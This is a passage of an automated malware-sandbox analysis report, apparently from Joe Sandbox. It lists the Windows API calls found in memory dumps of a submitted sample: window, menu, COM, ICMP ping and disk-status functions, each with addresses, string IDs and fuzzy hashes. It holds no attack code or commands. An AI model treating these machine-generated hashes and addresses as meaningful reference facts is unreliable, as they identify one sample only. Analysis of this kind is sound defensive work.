                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0093C3F1
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0093C3FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: d6d6dc9679b459e0041b2894d067b17f01d51b5458d7efaf1df5aee05cb79b2b
                                                                                                                • Instruction ID: bf103607bea40309fff6648e32d78676866d32f7bc926e80947c990633807ffe
                                                                                                                • Opcode Fuzzy Hash: d6d6dc9679b459e0041b2894d067b17f01d51b5458d7efaf1df5aee05cb79b2b
                                                                                                                • Instruction Fuzzy Hash: 945145B1B10605AFDF18CFA9DD99A6EBBBAFB88711F14812DF515E7290D7B09D008B10
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008E2036,?,00000000,?,?,?,?,008E16CB,00000000,?), ref: 008E1B9A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008E20D3
                                                                                                                • KillTimer.USER32(-00000001,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 008E216E
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0091BCA6
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 0091BCD7
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 0091BCEE
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 0091BD0A
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0091BD1C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 641708696-0
                                                                                                                • Opcode ID: 57d3f1631cc030ed001a277218750c6b6535e76096287c7fab351dcb3669020e
                                                                                                                • Instruction ID: eac8830bc21916976a726a2ef0d4b21eda5103a93ac5112aa49971090c7c643c
                                                                                                                • Opcode Fuzzy Hash: 57d3f1631cc030ed001a277218750c6b6535e76096287c7fab351dcb3669020e
                                                                                                                • Instruction Fuzzy Hash: 6261BF31228A54DFCB359F1AE958B2977F6FF42316F11452CE042D65B0C7B4A880EF81
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E25DB: GetWindowLongW.USER32(?,000000EB), ref: 008E25EC
                                                                                                                • GetSysColor.USER32(0000000F), ref: 008E21D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
                                                                                                                • Opcode ID: 242af940c7861d3cabe33c28861d4216c1f42c35c54d3f136e0720cb9aa38655
                                                                                                                • Instruction ID: da77d69bfe1cb1dadf1234591bb80a7b91a5074461b6420a7153aba35775d85b
                                                                                                                • Opcode Fuzzy Hash: 242af940c7861d3cabe33c28861d4216c1f42c35c54d3f136e0720cb9aa38655
                                                                                                                • Instruction Fuzzy Hash: 6741D331108184DBDB215F29EC98BB97B6AFB07331F154269FE65CA1E1C7718C82EB61
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,0096F910), ref: 0094A90B
                                                                                                                • GetDriveTypeW.KERNEL32(00000061,009989A0,00000061), ref: 0094A9D5
                                                                                                                • _wcscpy.LIBCMT ref: 0094A9FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                • API String ID: 2820617543-1000479233
                                                                                                                • Opcode ID: 29893b29f41ecf3da41dbe879e5e2cc053eeda1a1319ce788b448c061cd51fde
                                                                                                                • Instruction ID: 8eb85c819318100628658b43c2a786307d264a563a9f267a1333ff5cd5f716b1
                                                                                                                • Opcode Fuzzy Hash: 29893b29f41ecf3da41dbe879e5e2cc053eeda1a1319ce788b448c061cd51fde
                                                                                                                • Instruction Fuzzy Hash: 08519B31248341AFC710EF19C892EAFB7E9FF86304F14482DF596972A2DB719909CA53
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __i64tow__itow__swprintf
                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                • API String ID: 421087845-2263619337
                                                                                                                • Opcode ID: 5bdaed4bc1a871421d6de02b48565ddc732946dc45d3fdbcd06232b61e7e9716
                                                                                                                • Instruction ID: 386fecc09f60cc07dbf2b4dd6fa80b1e84e9e069237b8f45be67d6fcc28ec9e4
                                                                                                                • Opcode Fuzzy Hash: 5bdaed4bc1a871421d6de02b48565ddc732946dc45d3fdbcd06232b61e7e9716
                                                                                                                • Instruction Fuzzy Hash: 2941D47161020DAEDB24DF39D842BBA73E9FF86304F20447EE599DB292EA7199418B11
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0096716A
                                                                                                                • CreateMenu.USER32 ref: 00967185
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00967194
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00967221
                                                                                                                • IsMenu.USER32(?), ref: 00967237
                                                                                                                • CreatePopupMenu.USER32 ref: 00967241
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0096726E
                                                                                                                • DrawMenuBar.USER32 ref: 00967276
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                • String ID: 0$F
                                                                                                                • API String ID: 176399719-3044882817
                                                                                                                • Opcode ID: c749029d4468838840cd000d58d4c4188fbb0d8dcfd55410d4613b44baa62c1c
                                                                                                                • Instruction ID: 9b0485200a3cce9d5357e7a5cc7d9ba2b0a795d92c5638596f1f4fcb28bc3220
                                                                                                                • Opcode Fuzzy Hash: c749029d4468838840cd000d58d4c4188fbb0d8dcfd55410d4613b44baa62c1c
                                                                                                                • Instruction Fuzzy Hash: 10418874A15209EFDB20DFA4E894EAABBB9FF09314F140029F916A7360D771AD14DF90
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0096755E
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00967565
                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00967578
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00967580
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0096758B
                                                                                                                • DeleteDC.GDI32(00000000), ref: 00967594
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0096759E
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009675B2
                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009675BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                • Opcode ID: ec8ade2765a87cb0c334f9a8f9e3a67967d74ee7cee41abfce5dcc6e07670d57
                                                                                                                • Instruction ID: 7cb1f8ad76a77bb8fdf18fbd1b7dd50a52746051cb076b43e29024cd4987dd03
                                                                                                                • Opcode Fuzzy Hash: ec8ade2765a87cb0c334f9a8f9e3a67967d74ee7cee41abfce5dcc6e07670d57
                                                                                                                • Instruction Fuzzy Hash: 48317072118215BBDF119FA4EC18FDB7B6DFF09764F110228FA16960A0D771D811EBA4
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00906E3E
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                • __gmtime64_s.LIBCMT ref: 00906ED7
                                                                                                                • __gmtime64_s.LIBCMT ref: 00906F0D
                                                                                                                • __gmtime64_s.LIBCMT ref: 00906F2A
                                                                                                                • __allrem.LIBCMT ref: 00906F80
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00906F9C
                                                                                                                • __allrem.LIBCMT ref: 00906FB3
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00906FD1
                                                                                                                • __allrem.LIBCMT ref: 00906FE8
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00907006
                                                                                                                • __invoke_watson.LIBCMT ref: 00907077
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 384356119-0
                                                                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                • Instruction ID: 8f7dcc132c213a93bbdae73c2e3be14aa94f0dc382ff4053c9d94ba6f71f3819
                                                                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                • Instruction Fuzzy Hash: 327106B6E00717AFDB14AE68DC41B9AB7B8AF44760F148629F514E72C1E770ED508B90
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942542
                                                                                                                • GetMenuItemInfoW.USER32(009A5890,000000FF,00000000,00000030), ref: 009425A3
                                                                                                                • SetMenuItemInfoW.USER32(009A5890,00000004,00000000,00000030), ref: 009425D9
                                                                                                                • Sleep.KERNEL32(000001F4), ref: 009425EB
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0094262F
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0094264B
                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00942675
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 009426BA
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00942700
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00942714
                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00942735
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4176008265-0
                                                                                                                • Opcode ID: 6500333a154a3280700f1e3a7ca1ca1c0ca43558bca177f23078d765e5376fb6
                                                                                                                • Instruction ID: b1111bb025eadd88d04d76c7c5ff8ecd4bf58031fbc076cb643a65235bd14a37
                                                                                                                • Opcode Fuzzy Hash: 6500333a154a3280700f1e3a7ca1ca1c0ca43558bca177f23078d765e5376fb6
                                                                                                                • Instruction Fuzzy Hash: B061BB70914249AFDB21CFA4DC98EBEBBB8FB41304F95046AF842A7290D771AD05DB21
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00966FA5
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00966FA8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00966FCC
                                                                                                                • _memset.LIBCMT ref: 00966FDD
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00966FEF
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00967067
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 830647256-0
                                                                                                                • Opcode ID: df9ce6560839e60d539d0ed7fa7eccf71a694f8c9aa828e6772ab7793ba2489d
                                                                                                                • Instruction ID: e256dca42f218d45e2f858b7dad55c06d17691d226744d6b61d8c45c9e32f529
                                                                                                                • Opcode Fuzzy Hash: df9ce6560839e60d539d0ed7fa7eccf71a694f8c9aa828e6772ab7793ba2489d
                                                                                                                • Instruction Fuzzy Hash: 7D617E75A04208AFDB11DFA4CC81EEE77F8EF09714F10015AFA14AB2A1C775AD45DBA0
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00936BBF
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00936C18
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00936C2A
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00936C4A
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00936C9D
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00936CB1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00936CC6
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00936CD3
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00936CDC
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00936CEE
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00936CF9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                • Opcode ID: bf2a75307c6a02e9511fd09dfe60ca90f4e4170ae4bad28655a0649aed26557c
                                                                                                                • Instruction ID: a146333e733966b8c44036b82c026cd96cf908376c770eaea835eec674659baa
                                                                                                                • Opcode Fuzzy Hash: bf2a75307c6a02e9511fd09dfe60ca90f4e4170ae4bad28655a0649aed26557c
                                                                                                                • Instruction Fuzzy Hash: 6C416071A04219AFCF00DFA9D8589AEBBB9FF48350F00C079E955E7261CB70A945DF91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • CoInitialize.OLE32 ref: 00958403
                                                                                                                • CoUninitialize.OLE32 ref: 0095840E
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00972BEC,?), ref: 0095846E
                                                                                                                • IIDFromString.OLE32(?,?), ref: 009584E1
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0095857B
                                                                                                                • VariantClear.OLEAUT32(?), ref: 009585DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                • Opcode ID: a105fbc644018e03c21eb33a91faa81f6b1080ae192159ed6f9d3c2ad76b885c
                                                                                                                • Instruction ID: 148d461e3590c7463a35ba46da81f55aef639cebf52de04c4bd7c2b480c25f32
                                                                                                                • Opcode Fuzzy Hash: a105fbc644018e03c21eb33a91faa81f6b1080ae192159ed6f9d3c2ad76b885c
                                                                                                                • Instruction Fuzzy Hash: 9C61BC706083129FC710DF16C848B6BB7E8AF89745F00085DFD86AB2A1DB70ED49CB92
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00955793
                                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 009557D8
                                                                                                                • gethostbyname.WSOCK32(?), ref: 009557E4
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 009557F2
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00955862
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00955878
                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009558ED
                                                                                                                • WSACleanup.WSOCK32 ref: 009558F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: ea3187b6f2a5beab34aee7ee74efe4b4d21d4d77f486858759226791baf8e940
                                                                                                                • Instruction ID: 2b7da49c0a842d9373c397c06b36f52989652c849c37c48410e13133e1bc935f
                                                                                                                • Opcode Fuzzy Hash: ea3187b6f2a5beab34aee7ee74efe4b4d21d4d77f486858759226791baf8e940
                                                                                                                • Instruction Fuzzy Hash: 875180716047009FDB10EF26DC55B2AB7E4EF49721F058929FA96DB2A2DB70EC04DB42
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0094B4D0
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0094B546
                                                                                                                • GetLastError.KERNEL32 ref: 0094B550
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0094B5BD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
